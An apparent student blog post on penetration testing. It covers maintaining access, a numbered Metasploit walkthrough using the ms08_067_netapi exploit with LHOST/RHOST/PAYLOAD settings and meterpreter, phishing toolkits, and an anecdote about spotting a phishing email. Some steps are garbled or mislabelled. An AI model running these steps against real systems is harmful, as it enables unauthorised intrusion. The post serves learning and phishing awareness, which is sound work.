Maintaining Access

One of the most important phases of penetration testing is maintaining access. Once an ethical hacker has gained access to the target, he or she must maintain access long enough to accomplish his or her objectives. What I learned last week was that when I have located the vulnerabilities and exploit the target, there is still another phase where I should access or enter the system. To enter the system there are many ways such as using backdoor or maybe escalate privileges to gain more access to the system. Recently, I found that Metasploit is really a great tool to use. Other tools that I found  also useful on the internet are Webshells, Powersploit and Weevely.

Target Exploitation

Target exploitation is one of the most important phases of a penetration test. It focuses on establishing access to a system by bypassing the security restrictions. An exploit itself is a piece of software or a sequence of command that takes advantage of a particular vulnerability which is the weakness in the system. Although exploits can occur in a variety of ways, one of the most common methods for exploits is launched from malicious websites. The victim could visit that malicious website by accident or they might be tricked by clicking that particular malicious website in a phishing email or a malicious advertisement. Target exploitation could be done by using Metasploit and below are the steps.

1. Make new IP address interface
– ifconfig (interface) (IPAddress) (subnetMask)
– sudo (interface) (ipAddress) (subnetMask) | To check only
2. Connect with the target by pinging them
– ping (IPAddress(target))
3. Start the Metasploit
– msfconsole
4. In this case, we try using Windows 8
– use windows/smb/ms08_067_netapi | Determine which target exploits
5. Check whether LHOST and RHOST are set or not
– show options
6. set LHOST (our IPAddress)
7. set RHOST (target’s IPAddress)
8. set PAYLOAD
10. exploit

Lastly, by using meterpreter, I could use a lot of commands such as shutdown, reboot, screenshot and other stuff that I could do remotely from my place.

Social Engineering

Social engineering is a technique that manipulates someone’s psychology to get one or more certain information by deceives them without they knowing our main goal which is to get personal/crucial information from them.

Nowadays, one of the most often technique used by people in social engineering is phishing. Phishing is a cyber crime which the attacker sent an email to the target, telephone, or text message that sometimes posing as a legitimate institution to lure the target to click the link that given by the attacker. In other words, the target will provide their sensitive data such as email, password, banking and credit card details. The information that the attacker got is then used to access the target’s account and of course, they have 100% control to your account.

Tools:

  • Social Engineering Toolkit(SET)
  • Gophish
  • SocialFish

Recently, my sister got a suspicious mail from Apple company through yahoo email. She realized that the email was suspicious when she saw the From section of the email.  See the picture below.

In the picture above the sender email address just too random and so suspicious, like how can a company like Apple has an email address with 888bestdeals.com. So she thought it is not from the official Apple company. But to make sure it is really fake so she forwarded me that email to me to ask me whether it is a real email or it is a phishing email. Thanks to my teacher I could know whether it is real or fake email by dragging my mouse cursor to the link. Although the sender used the phishing link as same as the real link of apple company, but sometimes it is just a fake by using href with blue color and underlined for the link. So to make it is real I try to drag my mouse cursor to the link.

Surprisingly, the attacker use another fake link by using URL shortener such as bit.ly.  When I checked using virustotal, of course the result will be like in the picture below:

Because the url based on bit.ly, so the virustotal.com will check that the url is clean.

So there is no other way to check using virustotal.com except I visited the phishing link itself. I have no screenshot of the phishing link because the website already shut down. But since I have the url, I copy paste the url to virustotal.com. And I found out that it was a phishing link.

In conclusion, be careful to any email that we have received. Always check the sender’s email and the link that given in that email.